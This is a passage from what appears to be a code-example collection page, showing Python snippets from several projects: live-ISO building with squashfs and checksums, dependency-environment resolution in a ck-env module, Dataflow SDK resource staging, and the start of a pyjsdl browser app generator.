        misc.copy_file(mt86plus, misc.join_paths(config.ISO_DIR, 'install/mt86plus'))
    if xen_kernel:
        message.sub_debug('Xen kernel', xen_kernel)
        misc.copy_file(xen_kernel, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(xen_kernel)))
    if xen_efi:
        message.sub_debug('Xen EFI kernel', xen_efi)
        misc.copy_file(xen_efi, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(xen_efi)))
    if ipxe_kernel:
        message.sub_debug('iPXE kernel', ipxe_kernel)
        misc.copy_file(ipxe_kernel, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(ipxe_kernel)))
    if ipxe_efi:
        message.sub_debug('iPXE EFI kernel', ipxe_efi)
        misc.copy_file(ipxe_efi, \
            misc.join_paths(config.ISO_DIR, 'casper/' + os.path.basename(ipxe_efi)))

    message.sub_info('Extracting casper UUID')
    confdir = config.FILESYSTEM_DIR + '/conf'
    if os.path.isdir(confdir):
        shutil.rmtree(confdir)
    os.makedirs(confdir)
    try:
        misc.chroot_exec('zcat ' + initrd.replace(config.FILESYSTEM_DIR, '') + ' | cpio --quiet -id conf/uuid.conf', \
            shell=True, cwd=config.FILESYSTEM_DIR)
        kernel = re.search('initrd.img-*.*.*-*-(.*)', initrd).group(1)
        message.sub_debug('Kernel', kernel)
        misc.copy_file(confdir + '/uuid.conf', misc.join_paths(config.ISO_DIR, \
            '.disk/casper-uuid-' + kernel))
    finally:
        shutil.rmtree(confdir)

    # Define some default compression parameters, including a 1MB blocksize for all compressors.
    compression_parameters = ('-b', '1048576', '-comp', config.COMPRESSION)
    if config.COMPRESSION == 'xz':  # Append additional compression parameters for xz.
        # Using the branch-call-jump filter provides a compression boost with executable code.
        # This can save a hundred megabytes easily, on an 800MB ISO. The dictionary size must
        # match the block size, and it's advisable to use larger block sizes, like 1MB or 4MB.
        compression_parameters += ('-Xbcj', 'x86', '-Xdict-size', '100%')
    message.sub_info('SquashFS Compression parameters', compression_parameters)

    # Create the compressed filesystem
    message.sub_info('Creating SquashFS compressed filesystem')
    make_squash_fs = ('mksquashfs', config.FILESYSTEM_DIR, \
        misc.join_paths(config.ISO_DIR, 'casper/filesystem.squashfs'), \
        '-wildcards', '-no-recovery', '-noappend', \
        '-ef', os.path.join(sys.prefix, 'share/customizer/exclude.list'))
    misc.system_command(make_squash_fs + compression_parameters)

    message.sub_info('Checking SquashFS filesystem size')
    sfs_size = os.path.getsize(misc.join_paths(config.ISO_DIR, \
        'casper/filesystem.squashfs'))
    message.sub_debug('SquashFS filesystem size', sfs_size)
    if sfs_size > 4000000000:
        raise(message.exception('The SquashFS filesystem size is greater than 4GB'))

    message.sub_info('Creating filesystem.size')
    fs_size = 0
    for root, subdirs, files in os.walk(config.FILESYSTEM_DIR):
        for sfile in files:
            sfull = os.path.join(root, sfile)
            if os.path.islink(sfull):
                continue
            # FIXME: respect ignored files from exclude.list
            fs_size += os.path.getsize(sfull)
    message.sub_debug('Root filesystem size', fs_size)
    misc.write_file(misc.join_paths(config.ISO_DIR, \
        'casper/filesystem.size'), str(fs_size))

    message.sub_info('Creating filesystem.manifest')
    lpackages = misc.chroot_exec(('dpkg-query', '-W', \
        '--showformat=${Package} ${Version}\\n'), prepare=False, mount=False, \
        output=True)
    message.sub_debug('Packages', lpackages)
    misc.write_file(misc.join_paths(config.ISO_DIR, \
        'casper/filesystem.manifest'), lpackages)

    # FIXME: do some kung-fu to check if packages are installed
    # and remove them from filesystem.manifest-remove if they are not

    # Creating a md5sum.txt file fixes lubuntu's integrity check.
    md5sums_file = misc.join_paths(config.ISO_DIR, 'md5sum.txt')
    if os.path.isfile(md5sums_file):
        message.sub_info('Creating md5sum.txt')
        misc.write_file(md5sums_file, '')
        for sfile in misc.list_files(config.ISO_DIR):
            if sfile.endswith('md5sum.txt'):
                continue
            if sfile.endswith('SHA256SUMS'):
                continue
            message.sub_debug('MD5 Checksumming', sfile)
            checksum = misc.generate_hash_for_file('md5', sfile)
            misc.append_file(md5sums_file, checksum + '  .' + \
                sfile.replace(config.ISO_DIR, '') +'\n')

    # Creating a SHA256SUMS file fixes ubuntu-mini-remix's integrity check.
    shasums_file = misc.join_paths(config.ISO_DIR, 'SHA256SUMS')
    if os.path.isfile(shasums_file):
        message.sub_info('Creating SHA256SUMS')
        misc.write_file(shasums_file, '')
        for sfile in misc.list_files(config.ISO_DIR):
            if sfile.endswith('md5sum.txt'):
                continue
            if sfile.endswith('SHA256SUMS'):
                continue
            message.sub_debug('SHA256 Checksumming', sfile)
            checksum = misc.generate_hash_for_file('sha256', sfile)
            misc.append_file(shasums_file, checksum + '  .' + \
                sfile.replace(config.ISO_DIR, '') +'\n')

    # Create the ISO filesystem
    message.sub_info('Creating ISO')
    os.chdir(config.ISO_DIR)
    misc.system_command(('xorriso', '-as', 'mkisofs', '-r', '-V', \
        distrib + '-' + arch + '-' + release, '-b', 'isolinux/isolinux.bin', \
        '-c', 'isolinux/boot.cat', '-J', '-l', '-no-emul-boot', \
        '-boot-load-size', '4', '-boot-info-table', '-o', iso_file, \
        '-cache-inodes', '-input-charset', 'utf-8', '.'))

    message.sub_info('Creating ISO checksums')
    md5checksum = misc.generate_hash_for_file('md5', iso_file)
    message.sub_info('ISO md5 checksum', md5checksum)
    misc.append_file(md5sum_iso_file, md5checksum + '  .' + \
        iso_file.replace(config.WORK_DIR, '') +'\n')
    sha1checksum = misc.generate_hash_for_file('sha1', iso_file)
    message.sub_info('ISO sha1 checksum', sha1checksum)
    misc.append_file(sha1sum_iso_file, sha1checksum + '  .' + \
        iso_file.replace(config.WORK_DIR, '') +'\n')
    sha256checksum = misc.generate_hash_for_file('sha256', iso_file)
    message.sub_info('ISO sha256 checksum', sha256checksum)
    misc.append_file(sha256sum_iso_file, sha256checksum + '  .' + \
        iso_file.replace(config.WORK_DIR, '') +'\n')

    message.sub_info('Successfuly created ISO image', iso_file)

Example 10

Project: ck-env
Source File: module.py
View license
def set(i):
    """
    Input:  {
              (host_os)              - host OS (detect, if ommitted)
              (target_os)            - target OS (detect, if ommitted)
              (target_device_id)     - target device ID (detect, if omitted)

              (repo_uoa)             - repo where to limit search

              (uoa)                  - environment UOA entry
               or
              (tags)                 - search UOA by tags (separated by comma)

              (no_tags)              - exclude entris with these tags separated by comma

              (local)                - if 'yes', add host_os, target_os, target_device_id to search

              (key)                  - key from deps (to set env with path)
              (name)                 - user-friendly name of the dependency (if needs to be resolved)

              (deps)                 - already resolved deps
              (skip_auto_resolution) - if 'yes', do not check if deps are already resolved
              (skip_default)         - if 'yes', skip detection of default installed software version
              (skip_pruning_by_other_deps) - if 'yes', do not prune available envs using other resolved deps

              (bat_file)             - if !='', use this filename to generate/append bat file ...
              (bat_new)              - if 'yes', start new bat file

              (env)                  - existing environment

              (print)                - if 'yes', print found environment

              (random)               - if 'yes' and there is a choice, select random
                                       (useful for quiet experiment crowdsourcing such as sw/hw crowdtuning)

              (quiet)                - if 'yes', automatically provide default answer to all questions when resolving dependencies ... 
            }

    Output: {
              return           - return code =  0, if successful
                                             = 32, if environment was deleted (env_uoa - env which was not found)
                                             >  0, if error
              (error)          - error text if return > 0

              env_uoa          - found environment UOA
              env              - updated environment
              bat              - string for bat file
              lst              - all found entries
              dict             - meta of the selected env entry
              detected_version - detected version of a software
            }

    """

    import os
    import copy
    import json

    o=i.get('out','')
    oo=''
    if o=='con': oo='con'

    ran=i.get('random','')
    quiet=i.get('quiet','')

    name=i.get('name','')

    # Clean output file
    sar=i.get('skip_auto_resolution','')
    cdeps=i.get('deps',{})

    sd=i.get('skip_default','')

    bf=i.get('bat_file','')
    if bf!='' and os.path.isfile(bf): os.remove(bf)

    # Check host/target OS/CPU
    hos=i.get('host_os','')
    tos=i.get('target_os','')
    tdid=i.get('target_device_id','')
    if tdid=='': tdid=i.get('device_id','')

    user_env=False
    if hos!='' or tos!='' or tdid!='': user_env=True

    # Get some info about OS
    ii={'action':'detect',
        'module_uoa':cfg['module_deps']['platform.os'],
        'host_os':hos,
        'target_os':tos,
        'device_id':tdid,
        'skip_info_collection':'yes'}
    r=ck.access(ii)
    if r['return']>0: return r

    hos=r['host_os_uid']
    hosx=r['host_os_uoa']
    hosd=r['host_os_dict']

    ck_os_name=hosd['ck_name']

    tos=r['os_uid']
    tosx=r['os_uoa']
    tosd=r['os_dict']

    # Check if base is different
    x1=hosd.get('base_uid','')
    x2=hosd.get('base_uoa','')
    if x1!='' and x2!='': 
       hos=x1
       hosx=x2
    x1=tosd.get('base_uid','')
    x2=tosd.get('base_uoa','')
    if x1!='' and x2!='': 
       tos=x1
       tosx=x2

    remote=tosd.get('remote','')

    tbits=tosd.get('bits','')

    hplat=hosd.get('ck_name','')

    eset=hosd.get('env_set','')
    svarb=hosd.get('env_var_start','')
    svare=hosd.get('env_var_stop','')
    sdirs=hosd.get('dir_sep','')
    evs=hosd.get('env_var_separator','')
    eifs=hosd.get('env_quotes_if_space','')
    nout=hosd.get('no_output','')

    # Check environment UOA
    enruoa=i.get('repo_uoa','')
    tags=i.get('tags','')
    no_tags=i.get('no_tags','')
    duoa=i.get('uoa','')

    lx=0
    dd={}
    setup={}

    # Search
    ii={'action':'search',
        'module_uoa':work['self_module_uid'],
        'tags':tags,
        'repo_uoa':enruoa,
        'data_uoa':duoa,
        'add_info':'yes',
        'add_meta':'yes'} # Need to sort by version, if ambiguity

    if user_env or i.get('local','')=='yes':
       setup={'host_os_uoa':hos,
              'target_os_uoa':tos,
              'target_os_bits':tbits}
       ii['search_dict']={'setup':setup}

    iii=copy.deepcopy(ii) # may need to repeat after registration

    # Prepare possible warning
    x='required software'
    if name!='': x='"'+name+'"'
    war='no registered CK environment was found for '+x+' dependency with tags="'+tags+'"'
    if len(setup)>0:
       ro=readable_os({'setup':setup})
       if ro['return']>0: return ro
       setup1=ro['setup1']

       war+=' and setup='+json.dumps(setup1)

    # Search for environment entries
    r=ck.access(ii)
    if r['return']>0: return r

    # Prune if needed
    if no_tags!='':
       r=prune_search_list({'lst':r['lst'], 'no_tags':no_tags})
       if r['return']>0: return r

    l=r['lst']
    lx=len(l)

    auoas=[]

    dname=''

    if lx==0 and duoa!='':
       return {'return':33, 'error':'either missing env ('+duoa+') or it exists but something changes in its dependencies or setup ('+str(setup)+'):'}

    # If no entries, try to detect default ones and repeat
    history_deps=[]
    showed_warning=False
    if lx==0:
       if o=='con' and tags!='':
          ck.out('')
          ck.out(' ********')
          ck.out(' WARNING: '+war)
          ck.out('')

          showed_warning=True

       # First, try to detect already installed software, but not registered (default)
       if sd!='yes':
          if o=='con':
             ck.out('  Trying to automatically detect required software ...')

          ii={'action':'search',
              'module_uoa':cfg['module_deps']['soft'],
              'tags':tags,
              'add_meta':'yes'}
          rx=ck.access(ii)
          if rx['return']>0: return rx

          slst=rx['lst']

          # Sorting and checking which has detection module
          detected=''
          ssi=0
          found=False
          for q in sorted(slst, key=lambda v: v.get('meta',{}).get('sort',0)):
              met=q.get('meta',{})
              auoa=q['data_uoa']
              auid=q['data_uid']
              aname=met.get('soft_name','')

              auoas.append(q['data_uoa'])
              ds=met.get('auto_detect','')
              if ds=='yes':
                 if auid not in history_deps:
                    # Check target
                    rx=ck.access({'action':'check_target',
                                  'module_uoa':cfg['module_deps']['soft'],
                                  'dict':met.get('customize',{}),
                                  'host_os_uoa':hosx,
                                  'host_os_dict':hosd,
                                  'target_os_uoa':tosx,
                                  'target_os_dict':tosd})
                    if rx['return']>0:
                       continue

                    history_deps.append(auid)
                    ssi+=1

                    if o=='con':
                       ck.out('')
                       ck.out('  '+str(ssi)+') Checking if "'+aname+'" ('+auoa+' / '+auid+') is installed ...')

                    # Detect software
                    ii={'action':'check',
                        'module_uoa':cfg['module_deps']['soft'],
                        'data_uoa':auid,
                        'skip_help':'yes',
                        'host_os':hos,
                        'target_os':tos,
                        'target_device_id':tdid,
#                        'deps':cdeps,
                        'out':oo}
                    if len(setup)>0:
                       ii.update(setup)
                    ry=ck.access(ii)
                    if ry['return']>0:
                       if o=='con':
                          ck.out('  (warning during intermediate step: '+ry['error']+')')
                    else:
                       found=True

                       hdeps=ry.get('deps',{})
                       for hd in hdeps:
                           xhd=hdeps[hd]
                           xxhd=xhd.get('dict',{}).get('soft_uoa','')
                           if xxhd not in history_deps:
                              history_deps.append(xxhd)

          # repeat search if at least one above setup was performed
          if not found:
             if o=='con':
                ck.out('    No software auto-detection scripts found for this software in CK :( ...')

                if len(auoas)>0:
                   ck.out('')
                   ck.out('       Checked following related CK soft entries:')
                   for q in auoas:
                       ck.out('        * '+q)

          else:
             r=ck.access(iii)
             if r['return']>0: return r

             # Prune if needed
             if no_tags!='':
                r=prune_search_list({'lst':r['lst'], 'no_tags':no_tags})
                if r['return']>0: return r

             l=r['lst']
             lx=len(l)

    # Re-check/prune existing environment using already resolved deps
    if lx>0:
       ilx=0
       if i.get('skip_pruning_by_other_deps','')!='yes' and lx>1 and sar!='yes':
          # Try auto-resolve or prune choices
          nls=[]
          for z in range(0, lx):
              j=l[z]
              zm=j.get('meta',{})
              cus=zm.get('customize','')
              zdeps=zm.get('deps',{})

              skip=False
              for q in zdeps:
                  jj=zdeps[q]
                  juoa=jj.get('uoa','')

                  for a in cdeps:
                      if a==q:
                         aa=cdeps[a]
                         if aa.get('skip_reuse','')!='yes':
                             auoa=aa.get('uoa','')

                             # Tricky part: basically if similar and already resolved current deps are not the same is underneath ones ...
                             if auoa!=juoa:
                                 skip=True
                                 break

                  if skip: break
              if not skip: nls.append(j)

          l=nls
          lx=len(l)

       # Select sub-deps (sort by version)
       if lx>1:
          ls=sorted(l, key=lambda k: (k.get('info',{}).get('data_name',k['data_uoa']),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 0, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 1, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 2, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 3, 0),
                                      internal_get_val(k.get('meta',{}).get('setup',{}).get('version_split',[]), 4, 0)),
                    reverse=True)

          l=ls

          if ran=='yes':
             from random import randint
             ilx=randint(0, lx-1)
          elif quiet=='yes':
             ilx=0
          else:
             if o=='con':
                xq='required software'
                if name!='': xq='"'+name+'"'

                xq+=' with tags="'+tags+'"'

                if len(setup)>0:
                   import json

                   ro=readable_os({'setup':setup})
                   if ro['return']>0: return ro
                   setup1=ro['setup1']

                   xq+=' and setup='+json.dumps(setup1)

                ck.out('')
                ck.out('More than one environment found for '+xq+':')
                zz={}
                for z in range(0, lx):
                    j=l[z]

                    zi=j.get('info',{})
                    zm=j.get('meta',{})
                    zu=j.get('data_uid','')
                    zdn=zi.get('data_name','')
                    cus=zm.get('customize','')
                    zdeps=zm.get('deps',{})
                    xsetup=zm.get('setup',{})
                    xtags=zm.get('tags','')
                    ver=cus.get('version','')

                    xtarget_os_uoa=xsetup.get('target_os_uoa','')

                    xstags=''
                    for t in xtags:
                        if t!='':
                           if xstags!='': xstags+=','
                           xstags+=t

                    zs=str(z)
                    zz[zs]=zu

                    ck.out('')
                    ck.out(zs+') '+zdn+' - v'+ver+' ('+xstags+' ('+zu+'))')

                    if len(zdeps)>0:
                       for j in sorted(zdeps, key=lambda v: zdeps[v].get('sort',0)):
                           jj=zdeps[j]
                           juoa=jj.get('uoa','')
                           jtags=jj.get('tags','')
                           jver=jj.get('ver','')

                           js='                                  '
                           js+='Dependency '+j+' (UOA='+juoa+', tags="'+jtags+'", version='+jver+')'
                           ck.out(js)

                ck.out('')
                rx=ck.inp({'text':'Select one of the options for '+xq+' or press Enter for 0: '})
                x=rx['string'].strip()

                if x=='': x='0'

                if x not in zz:
                   return {'return':1, 'error':'option is not recognized'}

                ilx=int(x)

       if ilx<len(l):
          duid=l[ilx]['data_uid']
          duoa=duid

          dname=l[ilx].get('info',{}).get('data_name','')

          dd=l[ilx].get('meta',{})

          if o=='con' and i.get('print','')=='yes':
             x=duoa
             if duid!=duoa: x+=' ('+duid+')'
             ck.out('CK environment found using tags "'+tags+'" : '+x)

    # No registered environments found and environment UOA is not explicitly defined
    if duoa=='':
#       if o=='con' and tags!='':
       if tags!='':

          if not showed_warning:
             ck.out('==========================================================================================')
             ck.out('WARNING: '+war)

          # Next, try to install via package for a given software
          ck.out('')
          ck.out('  Searching and installing CK software packages with these tags (if exist) ...')

#          if quiet=='yes':
#             ck.out('  Searching and installing package with these tags automatically ...')
#             a='y'
#          else:
#             rx=ck.inp({'text':'  Would you like to search and install package with these tags automatically (Y/n)? '})
#             a=rx['string'].strip().lower()
#
#          if a!='n' and a!='no':
          try:
              save_cur_dir=os.getcwd()
          except OSError:
              os.chdir('..')
              save_cur_dir=os.getcwd()

          vv={'action':'install',
              'module_uoa':cfg['module_deps']['package'],
              'out':oo,
              'tags':tags}
          vv['host_os']=hos
          vv['target_os']=tos
          vv['target_device_id']=tdid

          # Check if there is a compiler in resolved deps to reuse it
          xdeps={}
#             if len(cdeps.get('compiler',{}))>0: xdeps['compiler']=cdeps['compiler']
          if cdeps.get('compiler',{}).get('uoa','')!='': xdeps['compiler']=cdeps['compiler']
#             if len(cdeps.get('compiler-mcl',{}))>0: xdeps['compiler-mcl']=cdeps['compiler-mcl']
          if cdeps.get('compiler-mcl',{}).get('uoa','')!='': xdeps['compiler-mcl']=cdeps['compiler-mcl']
          if len(xdeps)>0: vv['deps']=xdeps

          rx=ck.access(vv)
          if rx['return']==0:
             duoa=rx['env_data_uoa']
             duid=rx['env_data_uid']

             os.chdir(save_cur_dir)
          elif rx['return']!=16:
             return rx

       if duoa=='':
          if o=='con':
             ck.out('    CK packages are not found for this software :( !')
             ck.out('')

             if len(auoas)>0:
                if len(auoas)==1:
                   rx=ck.access({'action':'print_help',
                                 'module_uoa':cfg['module_deps']['soft'],
                                 'data_uoa':auoas[0],
                                 'platform':hplat})

                   rx=ck.inp({'text':'       Would you like to manually register software, i.e. if it is in an unusual path (y/N): '})
                   x=rx['string'].strip().lower()
                   if x=='yes' or x=='yes':
                      ck.out('')
                      rx=ck.access({'action':'setup',
                                    'module_uoa':cfg['module_deps']['soft'],
                                    'data_uoa':auoas[0],
                                    'out':'con'})
                      if rx['return']>0: return rx
                      ck.out('')

                else:
                   # Show possible Wiki page
                   rx=ck.inp({'text':'       Would you like to open wiki pages about related software (with possible installation info) (y/N): '})
                   x=rx['string'].strip().lower()

                   if x=='yes' or x=='yes':
                      ck.out('')
                      for q in auoas:
                          rx=ck.access({'action':'wiki',
                                        'module_uoa':cfg['module_deps']['soft'],
                                        'data_uoa':q})
                          if rx['return']>0: return rx
                      ck.out('')


          if o=='con':
             ck.out('')
          return {'return':1, 'error':war}

    # Load selected environment entry
    r=ck.access({'action':'load',
                 'module_uoa':work['self_module_uid'],
                 'data_uoa':duoa})
    if r['return']>0: 
       if r['return']==16:
          r['return']=32
          r['env_uoa']=duoa
       return r
    d=r['dict']
    p=r['path']

    dname=r.get('data_name','')
    if dname!='':
        d['data_name']=dname

    suoa=d.get('soft_uoa','')
    cs=None
    if suoa!='':
       r=ck.access({'action':'load',
                    'module_uoa':cfg['module_deps']['soft'],
                    'data_uoa':suoa})
       if r['return']>0: return r

       salias=r['data_alias']
       d['soft_alias']=salias

       # Check if has custom script
       rx=ck.load_module_from_path({'path':r['path'], 'module_code_name':cfg['custom_script_name'], 'skip_init':'yes'})
       if rx['return']==0: 
          cs=rx['code']

    # Check that all sub dependencies still exists (if full path)
    outdated=False
    to_delete=False
    err=''

    edeps=d.get('deps',{}) # dependencies of environment (normally resolved, but may change if software changes)
    for q in edeps:
        qq=edeps[q]
        cqq=qq.get('dict',{}).get('customize',{})
        sfc=cqq.get('skip_file_check','')
        fp=cqq.get('full_path','')

        if sfc!='yes' and fp!='' and not os.path.isfile(fp):
           outdated=True
           err='one of sub-dependencies ('+q+') have changed (file '+fp+' not found)'
           break

        deuoa=qq.get('uoa','')
        if deuoa!='':
           rx=ck.access({'action':'find',
                         'module_uoa':work['self_module_uid'],
                         'data_uoa':deuoa})
           if rx['return']>0:
              if rx['return']!=16: return rx
              outdated=True
              err='one of sub-dependencies ('+q+') have changed (CK environment '+deuoa+' not found)'
              break

    # Check if file exists for current dependency
    verx=''
    cus=d.get('customize',{})
    fp=cus.get('full_path','')

    tc='it appears that your environment has changed - '
    if not outdated and fp!='' and cus.get('skip_file_check','')!='yes' and not os.path.isfile(fp):
       err=tc+'software file not found in a specified path ('+fp+')'
       outdated=True

    ver_in_env=cus.get('version','') # detected version during installation
    if not outdated and ver_in_env!='':
       scmd=cus.get('soft_version_cmd',{}).get(ck_os_name,'')
       if scmd!='' and 'parse_version' in dir(cs):
          # Check version (via customized script) ...
          ii={'action':'get_version',
              'module_uoa':cfg['module_deps']['soft'],
              'full_path':fp,
              'bat':'',
              'host_os_dict':hosd,
              'target_os_dict':tosd,
              'cmd':scmd,
              'custom_script_obj':cs}
          rx=ck.access(ii)
          if rx['return']==0:
             verx=rx['version']
             if verx!='' and verx!=ver_in_env:
                err=tc+'version during installation ('+ver_in_env+') is not the same as current version ('+verx+')'
                outdated=True

    if outdated:
       if o=='con':
          ck.out('')
          ck.out('WARNING: '+err)

          ck.out('')
          rx=ck.inp({'text':'Would you like to remove outdated environment entry from CK (Y/n)? '})
          x=rx['string'].strip()

          if x=='n' or x=='no':
             return {'return':1, 'error':err}
          to_delete=True

       # Deleting outdated environment
       if to_delete:
          if o=='con':
             ck.out('')
             ck.out('Removing outdated environment entry '+duoa+' ...')

          rx=ck.access({'action':'delete',
                        'module_uoa':work['self_module_uid'],
                        'data_uoa':duoa})
          if rx['return']>0: return rx

          return {'return':1, 'error':'Outdated environment was removed - please, try again!'}

    # Prepare environment and bat
    env=i.get('env',{})
    xenv=d.get('env',{})
    env.update(xenv)

    env_call=hosd.get('env_call','')
    bin_prefix=hosd.get('bin_prefix','')

    # Process CMD first:
    sb=''

    es=d.get('env_script','')
    if es!='':
       pp=os.path.join(p,es)
       if i.get('key','')!='':
          sb+=eset+' CK_ENV_SCRIPT_'+i['key'].upper()+'='+pp+'\n'
       sb+=env_call+' '+pp+'\n'

    # Check bat file
    if bf!='':
       bn=i.get('bat_new','')
       x='a'
       if bn=='yes': x='w'

       try:
          fbf=open(bf, x)
          fbf.write(sb)
       except Exception as e: 
          fbf.close()
          return {'return':1, 'error':'problem writing environment file ('+format(e)+')'}

       fbf.close()

    return {'return':0, 'env_uoa':duoa, 'env':env, 'bat':sb, 'lst':l, 'dict':d, 'detected_version':verx}

Example 11

Project: DataflowPythonSDK
Source File: dependency.py
View license
def stage_job_resources(
    options, file_copy=_dependency_file_copy, build_setup_args=None,
    temp_dir=None, populate_requirements_cache=_populate_requirements_cache):
  """Creates (if needed) and stages job resources to options.staging_location.

  Args:
    options: Command line options. More specifically the function will expect
      staging_location, requirements_file, setup_file, and save_main_session
      options to be present.
    file_copy: Callable for copying files. The default version will copy from
      a local file to a GCS location using the gsutil tool available in the
      Google Cloud SDK package.
    build_setup_args: A list of command line arguments used to build a setup
      package. Used only if options.setup_file is not None. Used only for
      testing.
    temp_dir: Temporary folder where the resource building can happen. If None
      then a unique temp directory will be created. Used only for testing.
    populate_requirements_cache: Callable for populating the requirements cache.
      Used only for testing.

  Returns:
    A list of file names (no paths) for the resources staged. All the files
    are assumed to be staged in options.staging_location.

  Raises:
    RuntimeError: If files specified are not found or error encountered while
      trying to create the resources (e.g., build a setup package).
  """
  temp_dir = temp_dir or tempfile.mkdtemp()
  resources = []

  google_cloud_options = options.view_as(GoogleCloudOptions)
  setup_options = options.view_as(SetupOptions)
  # Make sure that all required options are specified. There are a few that have
  # defaults to support local running scenarios.
  if google_cloud_options.staging_location is None:
    raise RuntimeError(
        'The --staging_location option must be specified.')
  if google_cloud_options.temp_location is None:
    raise RuntimeError(
        'The --temp_location option must be specified.')

  # Stage a requirements file if present.
  if setup_options.requirements_file is not None:
    if not os.path.isfile(setup_options.requirements_file):
      raise RuntimeError('The file %s cannot be found. It was specified in the '
                         '--requirements_file command line option.' %
                         setup_options.requirements_file)
    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  REQUIREMENTS_FILE)
    file_copy(setup_options.requirements_file, staged_path)
    resources.append(REQUIREMENTS_FILE)
    requirements_cache_path = (
        os.path.join(tempfile.gettempdir(), 'dataflow-requirements-cache')
        if setup_options.requirements_cache is None
        else setup_options.requirements_cache)
    # Populate cache with packages from requirements and stage the files
    # in the cache.
    if not os.path.exists(requirements_cache_path):
      os.makedirs(requirements_cache_path)
    populate_requirements_cache(
        setup_options.requirements_file, requirements_cache_path)
    for pkg in  glob.glob(os.path.join(requirements_cache_path, '*')):
      file_copy(pkg, utils.path.join(google_cloud_options.staging_location,
                                     os.path.basename(pkg)))
      resources.append(os.path.basename(pkg))

  # Handle a setup file if present.
  # We will build the setup package locally and then copy it to the staging
  # location because the staging location is a GCS path and the file cannot be
  # created directly there.
  if setup_options.setup_file is not None:
    if not os.path.isfile(setup_options.setup_file):
      raise RuntimeError('The file %s cannot be found. It was specified in the '
                         '--setup_file command line option.' %
                         setup_options.setup_file)
    if os.path.basename(setup_options.setup_file) != 'setup.py':
      raise RuntimeError(
          'The --setup_file option expects the full path to a file named '
          'setup.py instead of %s' % setup_options.setup_file)
    tarball_file = _build_setup_package(setup_options.setup_file, temp_dir,
                                        build_setup_args)
    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  WORKFLOW_TARBALL_FILE)
    file_copy(tarball_file, staged_path)
    resources.append(WORKFLOW_TARBALL_FILE)

  # Handle extra local packages that should be staged.
  if setup_options.extra_packages is not None:
    resources.extend(
        _stage_extra_packages(setup_options.extra_packages,
                              google_cloud_options.staging_location,
                              file_copy=file_copy,
                              temp_dir=temp_dir))

  # Pickle the main session if requested.
  # We will create the pickled main session locally and then copy it to the
  # staging location because the staging location is a GCS path and the file
  # cannot be created directly there.
  if setup_options.save_main_session:
    pickled_session_file = os.path.join(temp_dir,
                                        names.PICKLED_MAIN_SESSION_FILE)
    pickler.dump_session(pickled_session_file)
    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  names.PICKLED_MAIN_SESSION_FILE)
    file_copy(pickled_session_file, staged_path)
    resources.append(names.PICKLED_MAIN_SESSION_FILE)

  if hasattr(setup_options, 'sdk_location') and setup_options.sdk_location:
    if setup_options.sdk_location == 'default':
      stage_tarball_from_remote_location = True
    elif (setup_options.sdk_location.startswith('gs://') or
          setup_options.sdk_location.startswith('http://') or
          setup_options.sdk_location.startswith('https://')):
      stage_tarball_from_remote_location = True
    else:
      stage_tarball_from_remote_location = False

    staged_path = utils.path.join(google_cloud_options.staging_location,
                                  names.DATAFLOW_SDK_TARBALL_FILE)
    if stage_tarball_from_remote_location:
      # If --sdk_location is not specified then the appropriate URL is built
      # based on the version of the currently running SDK. If the option is
      # present then no version matching is made and the exact URL or path
      # is expected.
      #
      # Unit tests running in the 'python setup.py test' context will
      # not have the sdk_location attribute present and therefore we
      # will not stage a tarball.
      if setup_options.sdk_location == 'default':
        sdk_remote_location = '%s/v%s.tar.gz' % (
            PACKAGES_URL_PREFIX, __version__)
      else:
        sdk_remote_location = setup_options.sdk_location
      _stage_dataflow_sdk_tarball(sdk_remote_location, staged_path, temp_dir)
      resources.append(names.DATAFLOW_SDK_TARBALL_FILE)
    else:
      # Check if we have a local Dataflow SDK tarball present. This branch is
      # used by tests running with the SDK built at head.
      if setup_options.sdk_location == 'default':
        module_path = os.path.abspath(__file__)
        sdk_path = os.path.join(
            os.path.dirname(module_path), '..', names.DATAFLOW_SDK_TARBALL_FILE)
      elif os.path.isdir(setup_options.sdk_location):
        sdk_path = os.path.join(
            setup_options.sdk_location, names.DATAFLOW_SDK_TARBALL_FILE)
      else:
        sdk_path = setup_options.sdk_location
      if os.path.isfile(sdk_path):
        logging.info('Copying dataflow SDK "%s" to staging location.', sdk_path)
        file_copy(sdk_path, staged_path)
        resources.append(names.DATAFLOW_SDK_TARBALL_FILE)
      else:
        if setup_options.sdk_location == 'default':
          raise RuntimeError('Cannot find default Dataflow SDK tar file "%s"',
                             sdk_path)
        else:
          raise RuntimeError(
              'The file "%s" cannot be found. Its location was specified by '
              'the --sdk_location command-line option.' %
              sdk_path)

  # Delete all temp files created while staging job resources.
  shutil.rmtree(temp_dir)
  return resources

Example 12

Project: pyjsdl
Source File: browser.py
View license
    def _generate_app_file(self, platform):
        # TODO: cache busting
        template = self.read_boilerplate('all.cache.html')
        name_parts = [self.top_module, platform, 'cache.html']
        done = self.done[platform]
        len_ouput_dir = len(self.output)+1

        app_name = self.top_module
        platform_name = platform.lower()
        dynamic = 0,
        app_headers = ''
        available_modules = self.unique_list_values(self.visited_modules[platform])
        early_static_app_libs = [] + self.early_static_app_libs
        static_app_libs = []
        dynamic_app_libs = []
        dynamic_js_libs = [] + self.dynamic_js_libs
        static_js_libs = [] + self.static_js_libs
        early_static_js_libs = [] + self.early_static_js_libs
        late_static_js_libs = [] + self.late_static_js_libs
        dynamic_modules = []
        not_unlinked_modules = [re.compile(m[1:]) for m in self.unlinked_modules if m[0] == '!']
        for m in required_modules:
            not_unlinked_modules.append(re.compile('^%s$' % m))
        unlinked_modules = [re.compile(m) for m in self.unlinked_modules if m[0] != '!' and m not in not_unlinked_modules]

        def static_code(libs, msg = None):
            code = []
            for lib in libs:
                fname = lib
                if not os.path.isfile(fname):
                    fname = os.path.join(self.output, lib)
                if not os.path.isfile(fname):
                    raise RuntimeError('File not found %r' % lib)
                if fname[len_ouput_dir:] == self.output:
                    name = fname[len_ouput_dir:]
                else:
                    name = os.path.basename(lib)
                code.append('<script type="text/javascript"><!--')
                if not msg is None:
